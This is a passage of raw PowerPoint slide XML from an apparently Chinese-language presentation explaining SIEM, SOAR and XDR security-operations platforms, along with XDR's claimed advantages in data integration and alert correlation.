              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全编排自动化和响应（SOAR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>端点检测与响应（EDR）以及网络流量分析（NTA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>集中安全数据和事件响应</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="501966" y="3332390"/>
            <a:ext cx="11188065" cy="2207260"/>
            <a:chOff x="842" y="4943"/>
            <a:chExt cx="17619" cy="3476"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101" name="图片 100"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2204" y="4943"/>
              <a:ext cx="10866" cy="3476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="13717" y="4943"/>
              <a:ext cx="4745" cy="3440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="图片 9"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="13040" y="6115"/>
              <a:ext cx="687" cy="793"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="图片 18"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="842" y="5019"/>
              <a:ext cx="4176" cy="3400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301805" y="5534863"/>
            <a:ext cx="3400425" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>问题：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，防火墙等不同源</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SIEM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（Security,Information, andEventManagement）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>聚合日志数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4563110" y="5534863"/>
            <a:ext cx="3065780" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>问题：响应能力不足</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SOAR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（Security Orchestration, Automation and Response）通过剧本回放实现自动化响应</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8753747" y="5534863"/>
            <a:ext cx="3065780" cy="953135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>问题：告警孤岛、疲劳问题</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方案：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XDR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（Extended Detection and Response）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="1400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>自动关联和确认警报来减少遗漏警报，告警降噪</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58809B9A-78AA-45D1-80CF-8C7063449C54}"/>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模型架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92710" y="2113915"/>
            <a:ext cx="12032615" cy="89916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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XDR支持对终端、网络、云和工作负载的安全防护并具备控制能力，此外，还拥有安全集成和互操作能力、大数据处理和机器学习分析能力、自动化编排能力、威胁情报能力。XDR的优势体现在可演进式集成安全架构，更快、更深度的威胁发现，一处检测、全局响应，提升安全运营效率，支持混合基础设施和优化企业安全支出成本。</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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="237490" y="3080385"/>
            <a:ext cx="6536690" cy="3592830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="3682365"/>
            <a:ext cx="3810635" cy="737235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>核心优势</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：高质量数据集成</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>统一的范围广泛的数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）事件上下文信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="5311140"/>
            <a:ext cx="3810635" cy="737235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>核心优势</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：强大的算法分析能力</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）人工智能检测算法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）告警关联降噪算法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E8509D-1DC2-4A89-9A89-B9FC1C43792B}"/>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安全检测能力</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="左弧形箭头 38"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3941445" y="3342005"/>
